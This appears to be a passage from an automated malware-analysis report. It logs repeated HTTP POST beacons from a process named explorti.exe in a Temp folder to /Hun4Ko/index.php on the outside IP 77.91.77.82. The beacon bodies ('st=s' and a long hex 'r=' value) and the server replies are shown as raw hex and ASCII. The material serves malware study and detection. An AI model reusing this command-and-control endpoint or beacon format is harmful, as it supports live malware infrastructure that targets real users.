                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:55.511280060 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:55.736792088 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:55 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.44979077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:55.853626013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:56.572510958 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:56.573199034 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:56.794910908 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.44979177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:56.915982962 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:57.614166975 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:57.614829063 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:57.832214117 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.44979277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:57.949712038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:58.683682919 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:58.685049057 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:58.912738085 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.44979377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:23:59.026324987 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:23:59.726670027 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:23:59.727502108 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:23:59.946022987 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:23:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.44979477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:00.056796074 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:00.762262106 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:24:00.763000011 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:00.985932112 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.44979577.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:01.104216099 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:01.792587996 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:24:01.797882080 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:02.014763117 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                54192.168.2.44979677.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:02.134763956 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:02.836664915 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:24:02.837338924 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:03.056818008 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:02 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.44979777.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:03.166094065 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:03.859111071 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:03 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.44979877.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:03.867700100 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:04.585167885 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.44979977.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:04.699793100 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.44980077.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:04.716244936 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:05.430541039 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.44980177.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:05.543435097 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:06.253622055 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                60192.168.2.44980277.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:06.264303923 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:24:06.987862110 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                61192.168.2.44980377.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:07.105537891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:24:07.840920925 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:24:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                62192.168.2.44980477.91.77.82807888C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:24:07.850570917 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
